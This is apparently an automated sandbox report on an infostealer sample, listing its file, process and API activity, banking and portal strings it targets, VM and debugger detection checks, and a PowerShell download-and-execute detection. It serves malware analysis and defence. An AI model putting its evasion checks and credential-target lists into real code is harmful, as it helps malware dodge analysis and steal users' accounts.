Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_004133C0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00401160 GetSystemInfo,ExitProcess,

0_2_00401160

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: ba77748b9b.exe, 0000002E.00000002.2853920976.000000000274D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWd
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.13.dr	Binary or memory string: vmci.sys
Source: KJEHJKJE.0.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: KJEHJKJE.0.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: KJEHJKJE.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Amcache.hve.13.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: KJEHJKJE.0.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: axplong.exe, axplong.exe, 0000000A.00000002.2311209476.00000000010C1000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000F.00000002.2374969784.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000010.00000002.2374830999.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ba77748b9b.exe, 0000002E.00000002.2853783541.00000000026E0000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareoC
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual USB Mouse
Source: KJEHJKJE.0.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Amcache.hve.13.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: KJEHJKJE.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: KJEHJKJE.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: KJEHJKJE.0.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Amcache.hve.13.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: KJEHJKJE.0.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: KJEHJKJE.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: KJEHJKJE.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: KJEHJKJE.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.13.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin`
Source: KJEHJKJE.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.13.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: KJEHJKJE.0.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: KJEHJKJE.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: RoamingBKKFHIEGDH.exe, 00000005.00000002.2269772396.0000000000C51000.00000040.00000001.01000000.00000009.sdmp, RoamingAEGIJKEHCA.exe, 00000008.00000002.2345735174.00000000005CE000.00000040.00000001.01000000.0000000B.sdmp, axplong.exe, 00000009.00000002.2308351470.00000000010C1000.00000040.00000001.01000000.0000000D.sdmp, axplong.exe, 0000000A.00000002.2311209476.00000000010C1000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000F.00000002.2374969784.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000010.00000002.2374830999.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: KJEHJKJE.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.13.dr	Binary or memory string: VMware
Source: KJEHJKJE.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: KJEHJKJE.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: KJEHJKJE.0.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.13.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2420117641.00000000026F9000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 00000016.00000002.2778366166.0000000002825000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2881327122.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3029095226.000001F16D6CC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2918689311.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2942846800.000001F16D745000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: firefox.exe, 00000028.00000002.2884438644.000002618E7B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2856295783.00000130BDC1D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: KJEHJKJE.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: firefox.exe, 00000028.00000002.2881327122.00000261842C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RA
Source: Amcache.hve.13.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: KJEHJKJE.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: KJEHJKJE.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: RoamingBKKFHIEGDH.exe, 00000005.00000002.2273581727.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: build2.exe, 0000002C.00000003.2918689311.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2942846800.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.3002033924.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2917481359.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2968342255.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3029095226.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2927088647.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2999657910.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2979868835.000001F16D745000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW~V
Source: KJEHJKJE.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: ba77748b9b.exe, 0000002E.00000002.2853783541.00000000026E0000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: KJEHJKJE.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr	Binary or memory string: VMware VMCI Bus Device
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: KJEHJKJE.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.13.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: KJEHJKJE.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr	Binary or memory string: VMware, Inc.
Source: firefox.exe, 00000028.00000002.2881327122.00000261842A5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751624555.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWU.
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: KJEHJKJE.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.13.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: KJEHJKJE.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: KJEHJKJE.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: KJEHJKJE.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.13.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: KJEHJKJE.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: buildred.exe, 0000001A.00000002.2947483134.00000000065A5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842EB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842EC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842EB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2866002491.00000130BDD00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: firefox.exe, 0000002F.00000002.2851889197.00000130BD806000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW"<
Source: Amcache.hve.13.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-81814
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-81828
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-82992
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-81817
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-81835
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-81857
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-81836
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-81656

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe

Code function: 5_2_04EC0983 rdtsc

5_2_04EC0983

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0041ACFA

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00404610 VirtualProtect ?,00000004,00000100,00000000

0_2_00404610

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_004195E0

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00419160 mov eax, dword ptr fs:[00000030h]

0_2_00419160

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,

0_2_00405000

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041C8D9 SetUnhandledExceptionFilter,	0_2_0041C8D9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0041ACFA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041A718
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6C70B66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C70B1F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8BAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C8BAC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ba77748b9b.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ba77748b9b.exe PID: 8448, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_004190A0

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
